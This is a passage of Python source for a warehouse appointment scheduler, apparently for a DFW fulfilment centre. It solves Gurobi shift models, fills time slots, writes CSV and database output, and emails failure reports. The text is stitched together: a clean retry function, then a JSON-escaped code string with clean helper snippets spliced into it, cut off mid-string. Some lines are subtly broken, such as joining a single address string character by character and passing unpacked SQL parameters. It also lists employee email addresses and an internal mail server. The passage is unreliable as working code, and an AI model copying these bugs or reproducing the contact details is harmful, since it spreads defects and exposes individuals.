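    while len(excluded) < len(candidates):
        model = build_model(excluded)
        model.optimize()
        if model.status in (GRB.OPTIMAL, GRB.TIME_LIMIT):
            return model, excluded
        model.computeIIS()                 # record why this attempt was infeasible
        model.write('model_failed.ilp')
        remaining = [c for c in candidates if c not in excluded]
        excluded.append(max(remaining, key=lambda c: sizes[c]))
    return None, excluded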
constraint\r\n shift_limit = {}\r\n shift_dist = {}\r\n shift_assign = {}\r\n shift_stand = {}\r\n unit_shift = {}\r\n sku_shift = {}\r\n day1 = {}\r\n night1 = {}\r\n day2 = {} \r\n night2 ={}\r\n vas_shift_cons = {}\r\n vas_shift_appt = {}\r\n #day_shift Slot limitation\r\n shift_limit[j,1] = m2.addConstr(quicksum(y[j,k,1] for k in out_1[j]),GRB.LESS_EQUAL,slot_count[(j,'1')]-sch_sh[(j,'1')][2],name='shift_limit[%s;%d]'%(j,1))\r\n #night shift limitation\r\n shift_limit[j,2] = m2.addConstr(quicksum(y[j,k,2] for k in out_1[j]), GRB.LESS_EQUAL,slot_count[(j,'2')]-sch_sh[(j,'2')][2],name='shift_limit[%s;%d]'%(j,2))\r\n #vas limitation day shift\r\n if sch_vas_sh[j,'1'] <= 4000:\r\n vas_shift_cons[j,1] = m2.addConstr(quicksum(vas_units[k] * y[j,k,1] for k in out_1[j] if k not in stnd_ref),GRB.LESS_EQUAL,4000-sch_vas_sh[j,'1'],name= 'vas_shift_cons[%s;%d]' %(j,1))\r\n #vas limitation night shift\r\n if sch_vas_sh[j,'2'] <= 4000:\r\n vas_shift_cons[j,2] = m2.addConstr(quicksum(vas_units[k] * y[j,k,2] for k in out_1[j] if k not in stnd_ref),GRB.LESS_EQUAL,4000-sch_vas_sh[j,'2'],name= 'vas_shift_cons[%s;%d]' %(j,2))\r\n #data structures for model\r\n day1[(j,1)] = quicksum(units_sku_obj[k][0] * y[j,k,1] for k in out_1[j])\r\n night1[(j,1)] = quicksum(units_sku_obj[k][0] * y[j,k,2] for k in out_1[j])\r\n day2[(j,2)] = quicksum(units_sku_obj[k][1] * y[j,k,1] for k in out_1[j])\r\n night2[(j,2)] = quicksum(units_sku_obj[k][1] * y[j,k,2] for k in out_1[j])\r\n \r\n m2.update()\r\n #slot assignment constraint \r\n for k in out_1[j]:\r\n shift_assign[j,k] = m2.addConstr(quicksum(y[j,k,l] for l in range(1,3)),GRB.EQUAL,1,name='shift_assign[%s;%s]'%(j,k))\r\n m2.update()\r\n for k in out_1[j]:\r\n if vas_flag[k] == '1' and k not in std_ref:\r\n vas_shift_appt[j,k]= m2.addConstr(quicksum(y[j,k,l] for l in range(1,3) if (j,str(l)) not in vas_dt),GRB.EQUAL,1)\r\n #Shift Standing appointments\r\n for (k,l) in std_sh.keys():\r\n if k == j:\r\n for m in std_sh[(k,l)]:\r\n shift_stand[(k,l)] = m2.addConstr(y[k,m,l],GRB.EQUAL,1,name = 'shift_stand[%s;%s]'%(k,m))\r\n \r\n \r\n \r\n #container Standing appointments\r\n pw=0\r\n for k in out_1[j]:\r\n if cnt_fl[k]== '3.0':\r\n if pw == 0 and cont_appt[j] == 0:\r\n shift_stand[j,k] = m2.addConstr(y[j,k,1],GRB.EQUAL,1,name = 'shift_stand[%s;%s]'%(j,k))\r\n pw = pw+1\r\n else:\r\n shift_stand[j,k] = m2.addConstr(y[j,k,2],GRB.EQUAL,1,name = 'shift_stand[%s;%s]'%(j,k))\r\n \r\n #day shift unit limitation\r\n unit_shift[j,1]= m2.addConstr(US,GRB.GREATER_EQUAL,f[j][0]-sch_sh[(j,'1')][0]-day1[(j,1)]-exp_units[(j,'1')],name='unit_shift[%s;%d]'%(j,1))\r\n unit_shift[j,3]= m2.addConstr(US,GRB.GREATER_EQUAL,sch_sh[(j,'1')][0]+day1[(j,1)]+exp_units[(j,'1')]-f[j][0],name='unit_shift[%s;%d]'%(j,3))\r\n #night shift unit limitation\r\n unit_shift[j,2]= m2.addConstr(US,GRB.GREATER_EQUAL,f[j][1]-sch_sh[(j,'2')][0]-night1[(j,1)]-exp_units[(j,'2')],name='unit_shift[%s;%d]'%(j,2))\r\n unit_shift[j,4]= m2.addConstr(US,GRB.GREATER_EQUAL,sch_sh[(j,'2')][0]+night1[(j,1)]+exp_units[(j,'2')]-f[j][1],name='unit_shift[%s;%d]'%(j,4))\r\n #day shift SKU limitation\r\n sku_shift[j,1]= m2.addConstr(SS,GRB.GREATER_EQUAL,sch_sh[(j,'1')][1]+day2[(j,2)],name='sku_shift[%s;%d]'%(j,1))\r\n #night shift SKU limitation\r\n sku_shift[j,2]= m2.addConstr(SS,GRB.GREATER_EQUAL,sch_sh[(j,'2')][1]+night2[(j,2)],name='sku_shift[%s;%d]'%(j,2))\r\n m2.update()\r\n m2.Params.timeLimit = 600 #declaring timelimit for running model\r\n m2.write('shift_model.lp')#writing shift model\r\n m2.optimize()#Optimizing shift 
model\r\n #Printing Solver Part II solutions\r\n if m2.status == GRB.OPTIMAL or m2.status == GRB.TIME_LIMIT:\r\n for j,k,l in y.keys():\r\n if y[j,k,l].x > 0:\r\n if (j,l) in out_2:\r\n out_2[(j,l)].append(k)\r\n else:\r\n out_2[(j,l)] = [k]\r\n \r\n else:\r\n print(\"The shift model became infeasible\")\r\n logging.info(\"The shift model became infeasible\")\r\n m2.computeIIS()#computing infeasibility\r\n m2.write('shift_model_DFW.ilp')#writing causes of infeasibility\r\n m2.write('shift_model_failed.lp')\r\n m2.write('day_model_failed.lp')\r\n M2 = M2 +1 \r\n std = out_1[j]\r\n for k in std:\r\n for l in ref_num[k]:\r\n infeas_shift[(k,l)] = [str(TODAY),'DFW1','None',str(k),str(l),dt[k][0],cr_dt[k],'NOT_OPTIMAL']\r\n else:\r\n for k in out_1[j]:\r\n if (j,1) in out_2:\r\n out_2[(j,1)].append(k)\r\n else:\r\n out_2[(j,1)] = [k]\r\n df_sh = pd.DataFrame(data = infeas_shift.values())\r\n logger.info(\"Solved LP Model at Shift level\")\r\n #scheduling time slots\r\n #standing_appointment_slots\r\n out_copy = out_2.copy() \r\n st_slot = []\r\n \r\n #container_appointment_slots\r\n #Scheduling time slots\r\n logger.info(\"Scheduling time slots\")\r\n M3 = 1\r\n for (k,j) in out_2.keys():\r\n while len(out_2[(k,j)]) > 0:\r\n a = out_2[(k,j)].pop(0)\r\n if a not in stnd_ref:\r\n p = 0\r\n if cnt_fl[a] == '3.0': #container appointments\r\n if sch_slot[(k,'05:00:00','c')] < 1:\r\n if p == 0:\r\n if (k,'05:00:00') in out_3:\r\n out_3[(k,'05:00:00')].append(a)\r\n p = 1\r\n sch_slot[(k,'05:00:00','c')] = sch_slot[(k,'05:00:00','c')] + 1\r\n bulk_break[(k,'05:00:00')] = '1'\r\n bulk_break[(k,'05:30:00')] = '2'\r\n else:\r\n out_3[k,'05:00:00'] = [a]\r\n p = 1\r\n sch_slot[(k,'05:00:00','c')] = sch_slot[(k,'05:00:00','c')] + 1\r\n bulk_break[(k,'05:00:00')] = '1'\r\n bulk_break[(k,'05:30:00')] = '2'\r\n elif sch_slot[(k,'15:00:00','c')] < 1:\r\n if p == 0:\r\n if (k,'15:00:00') in out_3:\r\n out_3[(k,'15:00:00')].append(a)\r\n p = 1\r\n sch_slot[(k,'15:00:00','c')] = sch_slot[(k,'15:00:00','c')] + 1\r\n bulk_break[(k,'15:00:00')] = '1'\r\n else:\r\n out_3[k,'15:00:00'] = [a]\r\n p = 1\r\n sch_slot[(k,'15:00:00','c')] = sch_slot[(k,'15:00:00','c')] + 1\r\n bulk_break[(k,'15:00:00')] = '1'\r\n elif sch_slot[(k,'08:00:00','c')] < 1:\r\n if p == 0:\r\n if (k,'08:00:00') in out_3:\r\n out_3[(k,'08:00:00')].append(a)\r\n p = 1\r\n sch_slot[(k,'08:00:00','c')] = sch_slot[(k,'08:00:00','c')] + 1\r\n bulk_break[(k,'08:00:00')] = '1'\r\n else:\r\n out_3[k,'08:00:00'] = [a]\r\n p = 1\r\n sch_slot[(k,'08:00:00','c')] = sch_slot[(k,'08:00:00','c')] + 1\r\n bulk_break[(k,'08:00:00')] = '1'\r\n elif sch_slot[(k,'19:00:00','c')] < 1:\r\n if p == 0:\r\n if (k,'19:00:00') in out_3:\r\n out_3[(k,'19:00:00')].append(a)\r\n p = 1\r\n sch_slot[(k,'19:00:00','c')] = sch_slot[(k,'19:00:00','c')] + 1\r\n bulk_break[(k,'19:00:00')] = '1'\r\n else:\r\n out_3[k,'19:00:00'] = [a]\r\n p = 1\r\n sch_slot[(k,'19:00:00','c')] = sch_slot[(k,'19:00:00','c')] + 1\r\n bulk_break[(k,'19:00:00')] = '1'\r\n else:\r\n pass\r\n \r\n elif vas_flag[a] == '1':\r\n if j == 1:\r\n for d in sorted(day_slots[date_fl[k]]):\r\n if p == 0 and sch_vas_fl[(k,d)] == '0' and sch_slot[(k,d)] < 2 :\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n sch_vas_fl[(k,d)] = '1'\r\n else:\r\n pass\r\n for d in sorted(day_slots[date_fl[k]]):\r\n if p == 0 and sch_vas_fl[(k,d)] == '0' and sch_slot[(k,d)] <= 2:\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n 
sch_vas_fl[(k,d)] = '1'\r\n else:\r\n pass\r\n for d in sorted(day_slots[date_fl[k]]):\r\n if p == 0 and sch_slot[(k,d)] <= 2 and sch_vas_fl[(k,d)] == '0':\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n sch_vas_fl[(k,d)] = '1'\r\n else: \r\n pass\r\n else:\r\n for d in sorted(night_slots[date_fl[k]]):\r\n if p == 0 and sch_vas_fl[(k,d)] == '0' and sch_slot[(k,d)] < 2:\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n sch_vas_fl[(k,d)] = '1'\r\n else:\r\n pass\r\n for d in sorted(night_slots[date_fl[k]]):\r\n if p == 0 and sch_vas_fl[(k,d)] == '0' and sch_slot[(k,d)] <= 2:\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n sch_vas_fl[(k,d)] = '1'\r\n else:\r\n pass\r\n for d in sorted(night_slots[date_fl[k]]):\r\n if p == 0 and sch_slot[(k,d)] <= 3 and sch_vas_fl[(k,d)] == '0':\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n sch_vas_fl[(k,d)] = '1'\r\n else: \r\n pass\r\n \r\n if p == 1:\r\n gh = 0\r\n for d in sorted(day_slots[date_fl[k]]):\r\n if sch_vas_fl[(k,d)] == '1' and gh != 0 and gh != len(day_slots[date_fl[k]])-1:\r\n w = gh-1\r\n if w < len(day_slots[date_fl[k]]):\r\n sch_vas_fl[(k,day_slots[date_fl[k]][w])] = '2'\r\n w = gh+1\r\n if w < len(day_slots[date_fl[k]]):\r\n sch_vas_fl[(k,day_slots[date_fl[k]][w])] = '2'\r\n elif sch_vas_fl[(k,d)] == '1' and gh == 0:\r\n w = gh+1\r\n sch_vas_fl[(k,day_slots[date_fl[k]][w])] = '2'\r\n elif j == k and sch_vas_fl[(k,d)] == '1' and gh == len(day_slots[date_fl[k]])-1:\r\n w = gh-1\r\n sch_vas_fl[(k,day_slots[date_fl[k]][w])] = '2'\r\n else:\r\n pass\r\n gh = gh+1\r\n gh = 0\r\n for d in sorted(night_slots[date_fl[k]]):\r\n if sch_vas_fl[(k,d)] == '1' and gh != 0 and gh != len(night_slots[date_fl[k]])-1:\r\n w = gh-1\r\n if w < len(night_slots[date_fl[k]]):\r\n sch_vas_fl[(k,night_slots[date_fl[k]][w])] = '2'\r\n w = gh+1\r\n if w < len(night_slots[date_fl[k]]):\r\n sch_vas_fl[(k,night_slots[date_fl[k]][w])] = '2'\r\n elif sch_vas_fl[(k,d)] == '1' and gh == 0:\r\n w = gh+1\r\n sch_vas_fl[(k,night_slots[date_fl[k]][w])] = '2'\r\n elif sch_vas_fl[(k,d)] == '1' and gh == len(night_slots)-1:\r\n w = gh-1\r\n sch_vas_fl[(k,night_slots[date_fl[k]][w])] = '2'\r\n else:\r\n pass\r\n gh = gh+1\r\n elif b[a] == '1':\r\n if j == 1:\r\n for d in sorted(day_slots[date_fl[k]]):\r\n if p == 0 and bulk_break[(k,d)] == '0' and sch_slot[(k,d)] < 2:\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n bulk_break[(k,d)] = '1'\r\n else:\r\n pass\r\n for d in sorted(day_slots[date_fl[k]]):\r\n if p == 0 and bulk_break[(k,d)] == '0' and sch_slot[(k,d)] <= 2:\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n bulk_break[(k,d)] = '1'\r\n else:\r\n pass\r\n for d in sorted(day_slots[date_fl[k]]):\r\n if p == 0 and bulk_break[(k,d)] == '0' and sch_slot[(k,d)] <= 2:\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n bulk_break[(k,d)] = '1'\r\n else: \r\n pass\r\n else:\r\n for d in sorted(night_slots[date_fl[k]]):\r\n if p == 0 and bulk_break[(k,d)] == '0' and sch_slot[(k,d)] < 2:\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n bulk_break[(k,d)] = '1'\r\n else:\r\n pass\r\n for d in sorted(night_slots[date_fl[k]]):\r\n if p == 0 and bulk_break[(k,d)] == '0' and sch_slot[(k,d)] <= 2:\r\n if (k,d) in 
out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n bulk_break[(k,d)] = '1'\r\n else:\r\n pass\r\n for d in sorted(night_slots[date_fl[k]]):\r\n if p == 0 and bulk_break[(k,d)] == '0' and sch_slot[(k,d)] <= 2:\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n bulk_break[(k,d)] = '1'\r\n else: \r\n pass\r\n \r\n if p == 1:\r\n gh = 0\r\n for d in sorted(day_slots[date_fl[k]]):\r\n if bulk_break[(k,d)] == '1' and gh != 0 and gh != len(day_slots[date_fl[k]])-1:\r\n w = gh-1\r\n if w < len(day_slots[date_fl[k]]):\r\n bulk_break[(k,day_slots[date_fl[k]][w])] = '2'\r\n w = gh+1\r\n if w < len(day_slots):\r\n bulk_break[(k,day_slots[date_fl[k]][w])] = '2'\r\n gh = gh+1\r\n gh = 0\r\n for d in sorted(night_slots[date_fl[k]]):\r\n if bulk_break[(k,d)] == '1' and gh != 0 and gh != len(night_slots[date_fl[k]])-1:\r\n w = gh-1\r\n if w < len(night_slots[date_fl[k]]):\r\n bulk_break[(k,night_slots[date_fl[k]][w])] = '2'\r\n w = gh+1\r\n if w < len(night_slots):\r\n bulk_break[(k,night_slots[date_fl[k]][w])] = '2'\r\n gh = gh+1\r\n else: #other appointments\r\n if j == 1:\r\n for l in sorted(day_slots[date_fl[k]]):\r\n if l not in st_slot:\r\n if sch_slot[(k,l)] < 1:\r\n if p == 0:\r\n if (k,l) in out_3:\r\n out_3[(k,l)].append(a)\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n else:\r\n out_3[(k,l)] = [a]\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n \r\n if p == 0:\r\n for l in sorted(day_slots[date_fl[k]]):\r\n if sch_slot[(k,l)] < 2:\r\n if p == 0:\r\n if (k,l) in out_3:\r\n out_3[(k,l)].append(a)\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n else:\r\n out_3[(k,l)] = [a]\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1 \r\n if p == 0:\r\n for l in sorted(day_slots[date_fl[k]]):\r\n if sch_slot[(k,l)] < 3:\r\n if p == 0:\r\n if (k,l) in out_3:\r\n out_3[(k,l)].append(a)\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n else:\r\n out_3[(k,l)] = [a]\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n if p == 0:\r\n for l in sorted(day_slots[date_fl[k]]):\r\n if sch_slot[(k,l)] <= 3:\r\n if p == 0:\r\n if (k,l) in out_3:\r\n out_3[(k,l)].append(a)\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n else:\r\n out_3[(k,l)] = [a]\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n else:\r\n for l in sorted(night_slots[date_fl[k]]):\r\n if l not in st_slot:\r\n if sch_slot[(k,l)] < 1:\r\n if p == 0:\r\n if (k,l) in out_3:\r\n out_3[(k,l)].append(a)\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n else:\r\n out_3[(k,l)] = [a]\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n if p == 0:\r\n for l in sorted(night_slots[date_fl[k]]):\r\n if sch_slot[(k,l)] < 2:\r\n if p == 0:\r\n if (k,l) in out_3:\r\n out_3[(k,l)].append(a)\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n else:\r\n out_3[(k,l)] = [a]\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n if p == 0:\r\n for l in sorted(night_slots[date_fl[k]]):\r\n if sch_slot[(k,l)] < 3:\r\n if p == 0:\r\n if (k,l) in out_3:\r\n out_3[(k,l)].append(a)\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n else:\r\n out_3[(k,l)] = [a]\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n if p == 0:\r\n for l in sorted(night_slots[date_fl[k]]):\r\n if sch_slot[(k,l)] <= 3:\r\n if p == 0:\r\n if (k,l) in out_3:\r\n out_3[(k,l)].append(a)\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n else:\r\n out_3[(k,l)] = [a]\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n if p == 0:\r\n missed_ref.append(a)\r\n 
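# The repeated "< 1, then < 2, then < 3, then <= 3" scans above are a first-fit
# search with a rising capacity ceiling. A compact sketch of the same idea;
# `usage` stands in for sch_slot and `slots` for a day or night slot list:
def first_fit(date, slots, usage, tiers=(1, 2, 3, 4)):
    # Return the first slot whose current load is below the smallest workable tier.
    for cap in tiers:
        for slot in sorted(slots):
            if usage.get((date, slot), 0) < cap:
                usage[(date, slot)] = usage.get((date, slot), 0) + 1
                return slot
    return None  # caller records the appointment as missed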
logger.info(\"Completed Scheduling time slots\") \r\n print(M1)\r\n logger.info(\"No.of times day model failed: \"+ str(M1))\r\n print(M2)\r\n logger.info(\"No.of times shift model failed: \"+ str(M2))\r\n data = {}\r\n #Printing Schedule with units\r\n out_file = open('SCHEDULE_DFW_UNITS.csv','w')\r\n out_file.write('Id'+','+'Scheduled_date'+','+'shift'+','+'units'+','+'sku'+','+'VRDD-ORDD'+','+'VRDD'+','+'UPT_type')\r\n out_file.write('\\n')\r\n M3 = 0\r\n for i,j in sorted(out_2.keys()):\r\n for k in out_2[(i,j)]:\r\n out_file.write(str(k)+','+str(i)+','+str(j)+','+str(units_sku_obj[k][0])+','+str(units_sku_obj[k][1])+','+str(units_sku_obj[k][2])+','+str(dt[k][0]))\r\n out_file.write('\\n')\r\n out_file.close()\r\n a = str(dtm.datetime.today())\r\n logger.info(\"Writing Output to a CSV file\") \r\n #Printing the output schedule \r\n out_file = open('SCHEDULE_DFW_'+str(date)+'_.csv','w')\r\n out_file.write('Reference_number'+','+'PO_number'+','+'Scheduled_date'+','+'Scheduled_time'+','+'units'+','+'sku'+','+'hj_rank'+','+'vendor'+','+'carrier'+','+'delete'+','+'ORDD'+','+'VRDD'+','+'vas_units'+','+'VNA'+','+'Reason')\r\n out_file.write('\\n')\r\n for i,j in sorted(out_3.keys()):\r\n for k in out_3[(i,j)]:\r\n for l in ref_num[k]:\r\n if (vendor[k],j) in std_no:\r\n out_file.write(str(k)+','+str(l)+','+str(i)+','+str(j)+','+str(po[(k,l)][0])+','+str(po[(k,l)][1])+','+str(hj_rank[k])+','+str(v_name[k])+','+str(csr[k])+','+'N'+','+str(ordd[l])+','+str(vrdd[k])+','+str(vas_units[k])+','+'419'+','+str(std_no[(vendor[k],j)]))\r\n out_file.write('\\n')\r\n data[M3,l] = [a,k,l,i,j,po[(k,l)][0],po[(k,l)][1],v_name[k],cr_dt[k],'DFW1','Daily']\r\n else:\r\n out_file.write(str(k)+','+str(l)+','+str(i)+','+str(j)+','+str(po[(k,l)][0])+','+str(po[(k,l)][1])+','+str(hj_rank[k])+','+str(v_name[k])+','+str(csr[k])+','+'N'+','+str(ordd[l])+','+str(vrdd[k])+','+str(vas_units[k]))\r\n out_file.write('\\n')\r\n data[M3,l] = [a,k,l,i,j,po[(k,l)][0],po[(k,l)][1],v_name[k],cr_dt[k],'DFW1','Daily']\r\n M3 = M3+1\r\n df_out = pd.DataFrame(data = data.values())\r\n for i,j in rsch.keys():\r\n out_file.write(str(i)+','+str(j)+','+str(rsch[(i,j)][0])+','+str(rsch[(i,j)][1])+','+','+','+','+','+','+'Y')\r\n out_file.write('\\n')\r\n out_file.close()\r\n logger.info(\"CSV file is created\")\r\n logger.info(\"Writing data into Sandbox table\")\r\n #Writing Exception day model\r\n if df_day.empty == False:\r\n df_day.columns = ['rt','portal_fc','po_fc','ref','po','vrdd','cr_dt','rc']\r\n for index,row in df_day.iterrows():\r\n cur.execute('INSERT INTO sandbox_supply_chain.iso_exception (\"rundate\",\"portal_fc\",\"po_fc\",\"Ref_no\",\"PO_no\",\"VRDD\",\"created_dt\",\"reason_code\") VALUES (?,?,?,?,?,?,?,?)',\r\n (row['rt'],row['portal_fc'],row['po_fc'],row['ref'],row['po'],row['vrdd'],row['cr_dt'],row['rc']))\r\n #Writng Exception Shift model\r\n if df_sh.empty == False:\r\n df_sh.columns = ['rt','portal_fc','po_fc','ref','po','vrdd','cr_dt','rc']\r\n for index,row in df_sh.iterrows():\r\n cur.execute('INSERT INTO sandbox_supply_chain.iso_exception (\"rundate\",\"portal_fc\",\"po_fc\",\"Ref_no\",\"PO_no\",\"VRDD\",\"created_dt\",\"reason_code\") VALUES (?,?,?,?,?,?,?,?)',\r\n (row['rt'],row['portal_fc'],row['po_fc'],row['ref'],row['po'],row['vrdd'],row['cr_dt'],row['rc']))\r\n #writing ISO output\r\n if df_out.empty == False:\r\n df_out.columns = ['rt','ref','po','dt','tm','units','sku','vendor','cr_dt','FC_nm','Batch']\r\n for index,row in df_out.iterrows():\r\n cur.execute('INSERT INTO 
sandbox_supply_chain.ISO_OUTPUT_NEW (\"rundate\",\"Reference_number\",\"PO_number\",\"Sch_date\",\"Sch_time\",\"Units\",\"SKU\",\"vendor\",\"Created_dt\",\"FC_nm\",\"Batch\") VALUES (?,?,?,?,?,?,?,?,?,?,?)',\r\n (row['rt'],row['ref'],row['po'],row['dt'],row['tm'],row['units'],row['sku'],row['vendor'],row['cr_dt'],row['FC_nm'],row['Batch']))\r\n bulk_e = {}\r\n cnt = 0\r\n for i,j in sorted(out_3.keys()):\r\n dt = pd.to_datetime(i).date()\r\n tm = pd.to_datetime(j).time()\r\n combine = dtm.datetime.combine(dt,tm)\r\n est = pytz.timezone('US/Eastern')\r\n loc = est.localize(combine)\r\n utc = pytz.utc\r\n loc = loc.astimezone(utc)\r\n loc = loc.replace(tzinfo = None)\r\n for k in out_3[(i,j)]:\r\n for l in ref_num[k]:\r\n bulk_e[cnt] = [str(k),str(l),str(i),str(j),a,'0',a,'1',a,'1','DFW1',int(inc[k]),'419',str(loc)]\r\n cnt = cnt+1\r\n df_bulk = pd.DataFrame(data = bulk_e.values())\r\n if df_bulk.empty == False:\r\n df_bulk.columns = ['ref_no','po','date','time','csv_tm','csv_fl','hj_tm','hj_fl','bul_tm','bul_fl','FC_nm','inc_no','fr_type','gmt']\r\n for index,row in df_bulk.iterrows():\r\n cur.execute('INSERT INTO sandbox_supply_chain.iso_bulk_email (\"reference_number\",\"PO_number\",\"Scheduled_date\",\"Scheduled_time\",\"csv_timestamp\",\"csv_flag\",\"HJ_timestamp\",\"HJ_flag\",\"bulk_mail_timestamp\",\"bulk_mail_flag\",\"FC_nm\",\"Incident_NO\",\"Freight_type\",\"utc_time\") VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?)',\r\n row['ref_no'],row['po'],row['date'],row['time'],row['csv_tm'],row['csv_fl'],row['hj_tm'],row['hj_fl'],row['bul_tm'],row['bul_fl'],row['FC_nm'],row['inc_no'],row['fr_type'],row['gmt'])\r\n \r\n logger.info(\"Completed writing data into sandbox table\")\r\n sum1 = 0\r\n for i in out_1.keys():\r\n sum1 = sum1 + len(out_1[i])\r\n print(sum1)\r\n logger.info(\"No.of incidents in a day: \"+ str(sum1))\r\n \r\n sum3 = 0\r\n for (i,j) in out_3.keys():\r\n sum3 = sum3 + len(out_3[(i,j)])\r\n print(sum3)\r\n logger.info(\"No.of incidents scheduled: \"+ str(sum3))\r\n cnt = 0\r\n for i in vas_flag.keys():\r\n if vas_flag[i] == '1':\r\n cnt = cnt+1\r\n else:\r\n pass\r\n print (cnt)\r\n end_time = time.time()\r\n execution = end_time-start_time\r\n print(execution)\r\n logger.info(\"Execution time: \"+ str(execution)+\" SECONDS\")\r\n \r\n fromaddr = 'scsystems@chewy.com'\r\n toaddr = 'vmanohar@chewy.com'\r\n to = ', '.join(toaddr)\r\n msg = MIMEMultipart()\r\n msg['From'] = fromaddr\r\n msg['To'] = toaddr\r\n msg['Subject'] = \"Algorithm Successfully ran for DFW1\" \r\n body = \"Hello, \\nNo.of times Day Model failed: \"+str(M1)+\"\\nNo.of times Shift model failed: \"+str(M2)+\"\\nNo.of Incidents Requested: \"+str(sum1)+\"\\nNo.of Incidents Scheduled: \"+str(sum3)+\".\\nThanks\"\r\n msg.attach(MIMEText(body, 'plain'))\r\n server = smtplib.SMTP('smtp.chewymail.com', 25)\r\n text = msg.as_string()\r\n server.sendmail(fromaddr,toaddr.split(','), text)\r\n logger.info(\"Email was sent to the recipients: %s\" %(toaddr))\r\n server.quit()\r\n print(\"Email was sent to the recipients: %s\" %(toaddr))\r\n if M1 > 0 or M2 > 0:\r\n if M1 > 0 and M2==0:\r\n fromaddr = 'scsystems@chewy.com'\r\n toaddr = 'vmanohar@chewy.com,igonzalez1@chewy.com,EAlfonso@chewy.com,jxie@chewy.com'\r\n to = ', '.join(toaddr)\r\n file_list = ['day_model_DFW.ilp']\r\n msg = MIMEMultipart()\r\n msg['From'] = fromaddr\r\n msg['To'] = toaddr\r\n msg['Subject'] = \"LP Model Failed for DFW1 at day level\" \r\n body = \"Hello, \\nModel Failed at day level for\"+str(M1)+\"times.\\nThanks\\nVenkatesh\"\r\n 
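# The pytz localize/astimezone sequence above converts an Eastern date+time to a
# naive UTC datetime. On Python 3.9+ the stdlib zoneinfo module can do the same;
# shown as an alternative sketch, not what this script actually uses:
from datetime import datetime, timezone
from zoneinfo import ZoneInfo  # Python 3.9+

def eastern_to_utc_naive(date_str, time_str):
    # e.g. '2019-07-01', '05:00:00' -> naive UTC datetime
    local = datetime.fromisoformat(date_str + ' ' + time_str)
    local = local.replace(tzinfo=ZoneInfo('US/Eastern'))
    return local.astimezone(timezone.utc).replace(tzinfo=None)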
msg.attach(MIMEText(body, 'plain'))\r\n for j in file_list:\r\n file_path = j\r\n attachment = open(file_path, \"rb\")\r\n part = MIMEBase('application', 'octet-stream')\r\n part.set_payload((attachment).read())\r\n encoders.encode_base64(part)\r\n part.add_header('Content-Disposition', \"attachment; filename= %s\" % j)\r\n msg.attach(part)\r\n server = smtplib.SMTP('smtp.chewymail.com', 25)\r\n text = msg.as_string()\r\n server.sendmail(fromaddr,toaddr.split(','), text)\r\n logger.info(\"Email was sent to the recipients: %s\" %(toaddr))\r\n server.quit()\r\n print(\"Email was sent to the recipients: %s\" %(toaddr))\r\n elif M1==0 and M2 > 0:\r\n fromaddr = 'scsystems@chewy.com'\r\n toaddr = 'vmanohar@chewy.com,igonzalez1@chewy.com,EAlfonso@chewy.com,jxie@chewy.com'\r\n to = ', '.join(toaddr)\r\n file_list = ['shift_model_DFW.ilp']\r\n msg = MIMEMultipart()\r\n msg['From'] = fromaddr\r\n msg['To'] = toaddr\r\n msg['Subject'] = \"LP Model Failed for DFW1 at shift level\" \r\n body = \"Hello, \\nModel Failed at shift level\"+str(M2)+\"times.\\nThanks\\nVenkatesh\"\r\n msg.attach(MIMEText(body, 'plain'))\r\n for j in file_list:\r\n file_path = j\r\n attachment = open(file_path, \"rb\")\r\n part = MIMEBase('application', 'octet-stream')\r\n part.set_payload((attachment).read())\r\n encoders.encode_base64(part)\r\n part.add_header('Content-Disposition', \"attachment; filename= %s\" % j)\r\n msg.attach(part)\r\n server = smtplib.SMTP('smtp.chewymail.com', 25)\r\n text = msg.as_string()\r\n server.sendmail(fromaddr,toaddr.split(','), text)\r\n logger.info(\"Email was sent to the recipients: %s\" %(toaddr))\r\n server.quit()\r\n print(\"Email was sent 